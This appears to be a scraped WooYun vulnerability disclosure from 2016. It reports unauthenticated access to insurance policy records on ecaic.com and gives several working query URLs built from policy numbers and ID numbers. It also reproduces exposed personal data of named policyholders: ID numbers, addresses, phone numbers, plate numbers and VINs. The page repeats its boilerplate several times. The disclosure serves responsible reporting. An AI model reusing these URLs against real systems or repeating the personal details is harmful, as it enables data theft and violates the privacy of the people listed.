长安责任保险股份有限公司官网多处未授权访问涉及大量用户敏感信息（保险单号/保险人/地址/身份证/联系电话/车牌号/发动机号码等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0215492

漏洞标题：长安责任保险股份有限公司官网多处未授权访问涉及大量用户敏感信息（保险单号/保险人/地址/身份证/联系电话/车牌号/发动机号码等）

漏洞作者： 0x 80

提交时间：2016-06-03 10:04

修复时间：2016-07-18 11:20

公开时间：2016-07-18 11:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-06-03：细节已通知厂商并且等待厂商处理中
2016-06-03：厂商已经确认，细节仅向厂商公开
2016-06-13：细节向核心白帽子及相关领域专家公开
2016-06-23：细节向普通白帽子公开
2016-07-03：细节向实习白帽子公开
2016-07-18：细节向公众公开

简要描述：

长安责任保险股份有限公司官网多处未授权访问涉及大量用户敏感信息（保险单号/保险人/地址/身份证/联系电话/车牌号/发动机号码等）

详细说明：

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605012014320721000090&printNo=320721198507021814&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1

保单基本信息
保险单号： 	605012014320721000090 	投保人名称： 	刘二成
被保险人名称： 	刘二成 	被保险人身份证号码： 	320721198507021814
地址： 	江苏省赣榆县宋庄镇四新村农业三队573号 	联系电话: 	0
投保险种代码： 	0501 	投保险种名称： 	机动车辆保险
总保额： 	200000.00人民币 	总保费金额： 	1059.00人民币
起保日期： 	2014-02-24  00:00 	终保日期： 	2015-02-23  24:00
签单日期： 	2014-02-14 	保单流水号: 	0000284364
保险合同争议解决方式： 	诉讼 	核保人: 	自动核保
制单人： 	黄明 	经办人: 	秦曙光
优惠系数： 	0.0 	优惠事由： 	自主调整 续保 无赔款优待
车辆信息
车牌号码： 	苏GFT912 	使用性质： 	私人所有
发动机号码： 	D69T501137 	识别代码（车架号）： 	LS4AAB3D5DA402867
厂牌型号： 	长安SC6399D4Y 	排量： 	0.999L/KW
功率： 		登记日期： 	2013-02-17
车辆类型： 	客车 	车辆核定载重质量： 	0.0吨
核定载客人数： 	7人 		
缴费信息
已交保费金额： 	1059.00人民币 	欠保费金额： 	0.00人民币
缴费日期： 	2014-02-14 		
渠道信息
渠道类型： 	直接业务 	代理机构/人名称： 	
支付方式： 		支付对象： 	
机构代码或个人职业资格证书号码： 			
保单险别信息

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryListNew&type=queryClaim&policyNo=605012015350000000161&printNo=350126197611062712&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072014330314001508&printNo=412724198612068350&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2

保单基本信息
保险单号： 	605072015370701000587 	投保人名称： 	张艳红
被保险人名称： 	张艳红 	被保险人身份证号码： 	370902198306062725
地址： 	山东省潍坊高新区福寿东街1270号 	联系电话: 	15762056006
投保险种代码： 	0507 	投保险种名称： 	机动车交通事故责任强制保险
总保额： 	122000.0人民币 	总保费金额： 	950.0人民币
起保日期： 	2015-01-21  00:00 	终保日期： 	2016-01-20  24:00
签单日期： 	2015-01-20 	保单流水号: 	
保险合同争议解决方式： 	诉讼 	核保人: 	自动核保
制单人： 	徐毓良 	经办人: 	李维城
优惠系数： 	0.0 	优惠事由： 	
车辆信息
车牌号码： 		使用性质： 	私人所有
发动机号码： 	143550559 	识别代码（车架号）： 	LSGGA54E9FH076409
厂牌型号： 	别克SGM7161EAA3 	排量： 	1.598L/KW
功率： 		登记日期： 	2015-01-20
车辆类型： 	客车 	车辆核定载重质量： 	0.0吨
核定载客人数： 	5人

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=accidentstrongProposalOld&policyNo=628082015370708006901&printNo=370728196807303666&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605072015370785001454&printNo=370727197404028119&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2

漏洞证明：

http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072015370701000587&printNo=370902198306062725&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605012015370901000145&printNo=370921198705104557&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=accidentstrongProposalOld&policyNo=628082015110600000069&printNo=110101196204264046&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072014330314001508&printNo=412724198612068350&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckOld&policyNo=605072015320503000190&printNo=320922198512115759&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605072013370724001141&printNo=370724197503143877&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=1
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=ClaimQueryListNew&type=queryClaim&policyNo=605072015310000001535&printNo=66070138-X&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=4
http://www.ecaic.com/EbsWeb/getMyInsurance.do?UIAction=detailedCheckNew&policyNo=605072015370785001454&printNo=370727197404028119&flag=%CD%F8%C2%E7%B2%E9%D1%AF&ip=10.0.253.2&quarter=2

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-06-03 11:10

厂商回复：

已在处理中，感谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0215492

漏洞标题：长安责任保险股份有限公司官网多处未授权访问涉及大量用户敏感信息（保险单号/保险人/地址/身份证/联系电话/车牌号/发动机号码等）

相关厂商：ecaic.com

漏洞作者： 0x 80

提交时间：2016-06-03 10:04

修复时间：2016-07-18 11:20

公开时间：2016-07-18 11:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0215492

漏洞标题：长安责任保险股份有限公司官网多处未授权访问涉及大量用户敏感信息（保险单号/保险人/地址/身份证/联系电话/车牌号/发动机号码等）

相关厂商：ecaic.com

漏洞作者： 0x 80

提交时间：2016-06-03 10:04

修复时间：2016-07-18 11:20

公开时间：2016-07-18 11:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0215492"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 0x 80@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：